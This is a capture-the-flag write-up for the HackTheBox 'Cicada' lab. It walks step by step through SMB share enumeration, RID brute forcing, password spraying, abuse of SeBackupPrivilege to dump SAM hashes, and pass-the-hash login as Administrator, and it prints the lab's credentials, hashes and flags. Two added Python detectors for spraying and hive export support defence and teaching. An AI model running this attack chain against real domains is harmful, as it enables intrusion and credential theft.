HacktheBox-Cicada

Information gathering

start infoscan
10.10.11.35:445 open
10.10.11.35:135 open
10.10.11.35:139 open
10.10.11.35:88 open
[*] alive ports len is: 4
start vulscan
已完成 4/4
[*] 扫描结束,耗时: 7.961433112s

Add the host to the hosts file.

USER

SMB information leak

Port 445 is open, so try connecting with smbclient and list the shares first.

smbclient -L 10.10.11.35

Of these, HR can be connected to and its directory listed; the others cannot be read.

Note that downloading is done with the get command.

get "Notice from HR.txt"

View it locally:

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

The notice discloses the password Cicada$M6Corpb*@Lp#nZp!8.

User enumeration: RID brute force

User enumeration

enum4linux 10.10.11.35

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute

This brute-forces RIDs (Relative Identifiers).

The output is large, so filter it down to the SidTypeUser entries:

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep "SidTypeUser"
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)

Then write them to users.txt.

Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

Password spraying

Then spray the password we found.

crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
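From the defender's side, the spray above is one password tried against every account from a single source in a few seconds, so the signal in the domain controller's logs is breadth of accounts per source, not failures per account (which is what lockout policies count and what a spray is designed to stay under). The following Python is an added example, not part of the original writeup: it parses a constructed, simplified authentication log (the field layout and the source address 10.10.14.23 are assumptions for this example, not a Windows event format) and flags any source whose failures touched several distinct accounts inside a short window, listing which accounts also succeeded so they can be reset first.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed, simplified authentication records: timestamp, source IP,
# account, outcome. Real data would come from DC Security events such as
# 4625/4776 (NTLM) or 4771 (Kerberos pre-auth failure); this layout is an
# assumption made for the example, not a Windows export format.
SAMPLE_AUTH_LOG = """\
2024-09-28T10:00:01Z 10.10.14.23 CICADA\\Administrator FAILURE
2024-09-28T10:00:02Z 10.10.14.23 CICADA\\Guest FAILURE
2024-09-28T10:00:02Z 10.10.14.23 CICADA\\krbtgt FAILURE
2024-09-28T10:00:03Z 10.10.14.23 CICADA\\CICADA-DC$ FAILURE
2024-09-28T10:00:03Z 10.10.14.23 CICADA\\john.smoulder FAILURE
2024-09-28T10:00:04Z 10.10.14.23 CICADA\\sarah.dantelia FAILURE
2024-09-28T10:00:04Z 10.10.14.23 CICADA\\michael.wrightson SUCCESS
2024-09-28T10:00:05Z 10.10.14.23 CICADA\\david.orelious FAILURE
2024-09-28T10:00:05Z 10.10.14.23 CICADA\\emily.oscars FAILURE
2024-09-28T09:40:00Z 10.10.11.50 CICADA\\sarah.dantelia FAILURE
2024-09-28T09:40:09Z 10.10.11.50 CICADA\\sarah.dantelia FAILURE
2024-09-28T09:40:20Z 10.10.11.50 CICADA\\sarah.dantelia SUCCESS
"""


@dataclass(frozen=True)
class AuthEvent:
    when: datetime
    source: str
    account: str
    success: bool


def parse_auth_log(text: str) -> list[AuthEvent]:
    """Parse the constructed log format into events sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, acct, outcome = line.split()
        events.append(AuthEvent(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                                src, acct, outcome == "SUCCESS"))
    return sorted(events, key=lambda e: e.when)


def detect_spray(events: list[AuthEvent], window: timedelta = timedelta(minutes=10),
                 min_accounts: int = 5) -> dict:
    """Return {source: {"accounts": [...], "compromised": [...]}} for each source
    whose failed logons covered at least `min_accounts` distinct accounts within
    `window`. A user mistyping their own password twice (second source in the
    sample) never reaches the threshold; a spray does in seconds."""
    by_source = defaultdict(list)
    for e in events:
        by_source[e.source].append(e)

    alerts = {}
    for src, evs in by_source.items():
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it fits
            while evs[end].when - evs[start].when > window:
                start += 1
            span = evs[start:end + 1]
            failed = {e.account for e in span if not e.success}
            if len(failed) >= min_accounts:
                alerts[src] = {
                    "accounts": sorted(failed),
                    # accounts that accepted the sprayed password: reset these first
                    "compromised": sorted(e.account for e in span if e.success),
                }
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(f"spray from {src}: {len(info['accounts'])} accounts failed, "
              f"succeeded for {info['compromised']}")
```

The root cause the detection points back to is the one the writeup exposes: a default password sitting in a readable HR share that at least one account never rotated. Forcing a change at first logon and removing guest read access to the share close the gap; the detector above is what tells you the gap is being used in the meantime.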

Install enum4linux-ng: apt install enum4linux-ng

enum4linux-ng -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -A 10.10.11.35
....
====================================
| Users via RPC on 10.10.11.35 |
====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 8 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 8 user(s) via 'enumdomusers'
[+] After merging user results we have 8 user(s) total:
'1104':
username: john.smoulder
name: (null)
acb: '0x00000210'
description: (null)
'1105':
username: sarah.dantelia
name: (null)
acb: '0x00000210'
description: (null)
'1106':
username: michael.wrightson
name: (null)
acb: '0x00000210'
description: (null)
'1108':
username: david.orelious
name: (null)
acb: '0x00000210'
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
'1601':
username: emily.oscars
name: Emily Oscars
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: (null)
acb: '0x00000210'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000214'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00020011'
description: Key Distribution Center Service Account

david.orelious:aRt$Lp#7t*VQ!3

enum4linux-ng -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -A 10.10.11.35
=====================================
| Shares via RPC on 10.10.11.35 |
=====================================
[*] Enumerating shares
[+] Found 7 share(s):
ADMIN$:
comment: Remote Admin
type: Disk
C$:
comment: Default share
type: Disk
DEV:
comment: ''
type: Disk
HR:
comment: ''
type: Disk
IPC$:
comment: Remote IPC
type: IPC
NETLOGON:
comment: Logon server share
type: Disk
SYSVOL:
comment: Logon server share
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share DEV
[+] Mapping: OK, Listing: OK
[*] Testing share HR
[+] Mapping: OK, Listing: OK
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[+] Mapping: OK, Listing: OK
[*] Testing share SYSVOL
[+] Mapping: OK, Listing: OK

From the above, david can access /DEV. Use smbclient to take a look.

smbclient -U david.orelious //10.10.11.35/DEV

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

emily.oscars:Q!3@Lp#M6b*7t*Vt

The credentials work, so log in with evil-winrm.

evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

We can get user.txt:

6555995634d1a8c87ae5d6fdecc5e993

PE

Privilege escalation via SeBackupPrivilege

Check privileges:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Escalate privileges through SeBackupPrivilege.

Windows Privilege Escalation: SeBackupPrivilege - Hacking Articles

Following that procedure, first save the SAM and SYSTEM hives:

reg save hklm\sam sam
reg save hklm\system system

Download them:

download sam
download system

Then use impacket-secretsdump to extract the NTLM hashes.

impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Administrator:2b87e7c93a3e8a0ea4a581937016f341
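The escalation chain above leaves a distinctive trail on the host: a privilege check and then reg.exe exporting the SAM and SYSTEM hives, all spawned from a remote PowerShell session. As an added example that is not part of the original writeup, the Python below runs that detection logic over constructed process-creation records (the timestamps, image paths and the benign events are made up for this example; the command lines mirror the ones shown above). It treats any export of HKLM\SAM, HKLM\SYSTEM or HKLM\SECURITY as high severity, adds context when the parent is wsmprovhost.exe (the WinRM session host) or the account is not an approved backup account, and rates a `whoami /priv` from a remote session as low-severity reconnaissance.

```python
import re
from dataclasses import dataclass

# reg.exe save of a hive whose contents yield credential material.
SENSITIVE_HIVE_SAVE = re.compile(
    r"""\breg(?:\.exe)?\s+save\s+["']?(?:hklm|hkey_local_machine)\\(sam|system|security)\b""",
    re.IGNORECASE)
PRIV_ENUM = re.compile(r"\bwhoami(?:\.exe)?\s+/priv\b", re.IGNORECASE)
# Host process for remote PowerShell sessions over WinRM.
REMOTE_SHELL_PARENTS = {"wsmprovhost.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    when: str
    host: str
    user: str
    parent_image: str
    command_line: str


@dataclass(frozen=True)
class Alert:
    severity: str
    user: str
    reason: str
    command_line: str


def analyze(events: list[ProcessEvent],
            backup_accounts: frozenset[str] = frozenset()) -> list[Alert]:
    """Return one Alert per suspicious process-creation event."""
    approved = {a.lower() for a in backup_accounts}
    alerts = []
    for e in events:
        parent = e.parent_image.rsplit("\\", 1)[-1].lower()
        remote = parent in REMOTE_SHELL_PARENTS
        m = SENSITIVE_HIVE_SAVE.search(e.command_line)
        if m:
            reason = f"export of HKLM\\{m.group(1).upper()} hive"
            if e.user.lower() not in approved:
                reason += " by an account not approved for backups"
            if remote:
                reason += " from a WinRM session"
            alerts.append(Alert("high", e.user, reason, e.command_line))
        elif remote and PRIV_ENUM.search(e.command_line):
            alerts.append(Alert("low", e.user,
                                "privilege enumeration from a WinRM session", e.command_line))
    return alerts


# Constructed sample: the chain from the writeup plus two benign reg.exe uses.
WSMPROVHOST = "C:\\Windows\\System32\\wsmprovhost.exe"
SAMPLE_EVENTS = [
    ProcessEvent("2024-09-28T10:12:01Z", "CICADA-DC", "CICADA\\emily.oscars",
                 WSMPROVHOST, "whoami.exe /priv"),
    ProcessEvent("2024-09-28T10:13:40Z", "CICADA-DC", "CICADA\\emily.oscars",
                 WSMPROVHOST, "reg.exe save hklm\\sam sam"),
    ProcessEvent("2024-09-28T10:13:44Z", "CICADA-DC", "CICADA\\emily.oscars",
                 WSMPROVHOST, "reg.exe save hklm\\system system"),
    # benign: an admin reading a software key from an interactive shell
    ProcessEvent("2024-09-28T08:00:00Z", "CICADA-DC", "CICADA\\Administrator",
                 "C:\\Windows\\System32\\cmd.exe",
                 "reg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\""),
    # benign: scheduled export of an application key, not a credential hive
    ProcessEvent("2024-09-28T02:00:00Z", "CICADA-DC", "NT AUTHORITY\\SYSTEM",
                 "C:\\Windows\\System32\\svchost.exe",
                 "reg.exe save \"HKLM\\SOFTWARE\\ExampleApp\" C:\\Backup\\app.hiv"),
]


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.user}: {a.reason} :: {a.command_line}")
```

Detection is the second line here; the first is not granting SeBackupPrivilege on a domain controller to ordinary user accounts at all. Whoever holds it can read the SAM and SYSTEM hives (and, by the same mechanism, the directory database), so membership of the groups that confer it, Backup Operators above all, should be reviewed as carefully as Domain Admins.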

Then log in with the obtained hash:

evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'

bc0bce2233f5d10c1bc027a136813eea